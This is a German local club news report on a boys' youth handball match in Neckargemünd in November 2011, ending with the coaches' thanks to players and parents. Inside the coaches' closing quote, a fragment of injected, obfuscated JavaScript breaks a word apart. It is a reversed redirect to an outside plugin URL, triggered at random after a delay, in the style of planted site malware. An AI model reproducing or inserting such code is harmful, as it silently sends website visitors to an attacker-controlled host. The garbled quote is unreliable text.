Neckargemünd, 20.11.2011 (tho) – Mit einem deutlichen 22:6-Sieg konnte die männliche D-Jugend ihr Heimspiel gegen Neckarsteinach gewinnen und damit verlustpunktfrei die Herbstmeisterschaft einfahren.
Am Sonntag, 20.11.2011, trafen die D-Jugendlichen des Tabellenersten TV Neckargemünd und der Tabellenvierte TB Neckarsteinach in der Neckargemünd Münzenbachhalle aufeinander. Der TVN wollte dieses Spiel um jeden Preis gewinnen und somit die Herbstmeisterschaft mit einem Punkteverhältnis von 12:0 sichern. Dementsprechend motiviert waren die Jungs auch. Nach einer konzentrierten Aufwärmphase ging es auf die Platte.
Der TVN dominierte das Spiel von Anfang an und erreichte schnell das 5:0. Und das, obwohl zahlreiche Torchancen im Angriff ungenutzt blieben. Viele Bälle waren nicht platziert genug und dienten mehr einer zweiten Aufwärmrunde für den Torwart als zur Torausbeute. Auch in der Abwehr gab es einige fehlerhafte Absprachen, was Neckarsteinach den ersten Torerfolg ermöglichte. Zum Ende der ersten Halbzeit stand es damit 7:1.
In der zweiten Halbzeit ging Neckargemünd konzentrierter zur Sache. Die Abwehr stand kompakt und nahm sich vor, dem Gegner keine Torchancen mehr gewähren. Leider konnte dieses Vorhaben nicht gänzlich in die Tat umgesetzt werden. Der Spielverlauf in der zweiten Halbzeit entwickelte sich über ein 13:2, 16:4 und 18:6 bis zum Endresultat von 22:6. Dennoch funktionierte der Angriff in der zweiten Halbzeit wesentlich besser. Auch Torchancen wurden viel besser genutzt. Letztlich können alle mit der Leistung und dem verdienten Sieg vollauf zufrieden sein.
Alle Spieler mit mindestens einem Tor am Ergebnis beteiligt
Das von den Trainern gesteckte Ziel, dass jeder Spieler mindestens ein Tor erzielen soll, wurde erreicht. Aufgrund dieser breit aufgestellten Leistungsfähigkeit und dem Gewinn der Herbstmeisterschaft haben sich die TVN-Spieler den anschließenden Kuchen der Eltern redlich verdient.
Die Trainer Luca und Tessa gratulieren der Mannschaft ganz herzlich zur Herbstmeisterschaft 2011. „Wir sind stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolz auf die von allen erbrachte Leistung und hoffen, dass wir die Rückrunde genauso erfolgreich abschließen wie die Hinrunde“, lautete das gemeinsame Fazit.
An dieser Stelle auch nochmals vielen Dank an alle Eltern, die uns die Hinrunde über leidenschaftlich unterstützt haben. „Ihr wart uns eine wichtige Stütze und wir bauen auch in Zukunft auf euch.“